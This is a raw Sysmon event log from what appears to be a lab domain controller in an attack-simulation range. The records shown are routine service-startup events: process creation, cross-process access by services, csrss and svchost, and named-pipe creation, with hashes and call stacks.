12:01:01.127{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.076{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 17141700x80000000000000001680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.112{266CAFBE-647C-6064-2C00-00000000AE01}2916\PSHost.132616656609980777.2916.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000001679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.112{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.112{266CAFBE-646A-6064-0A00-00000000AE01}840928C:\Windows\system32\services.exe{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.098{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\System32\dfssvc.exe10.0.14393.4283 (rs1_release.210303-1802)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8548C5144E55B79299A0880858A9AF13,SHA256=1EA1D6DB68F92535811D71CA97C2B3A9F9D3409DE8C5FA089658E73B7D3A0689,IMPHASH=D38366C43D0F6223104A675303D8E8CB{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646A-6064-0A00-00000000AE01}8401136C:\Windows\system32\services.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.072{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exe10.0.14393.4283 (rs1_release.210303-1802)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8DD15A9DA01C57E0C12E95A5B4A8D242,SHA256=CA8C55567793E0CF2D297E19736F5F5F88430CAB5E3EB9A2160052D39FC9F88D,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 17141700x80000000000000001673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.096{266CAFBE-646A-6064-0B00-00000000AE01}856\efsrpcC:\Windows\system32\lsass.exe 10341000x80000000000000001672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.096{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646A-6064-0A00-00000000AE01}8402500C:\Windows\system32\services.exe{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646A-6064-0A00-00000000AE01}8402500C:\Windows\system32\services.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 11241100x80000000000000001654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_barrpzxw.gij.ps12021-03-31 12:01:01.080 10341000x80000000000000001653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.078{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT 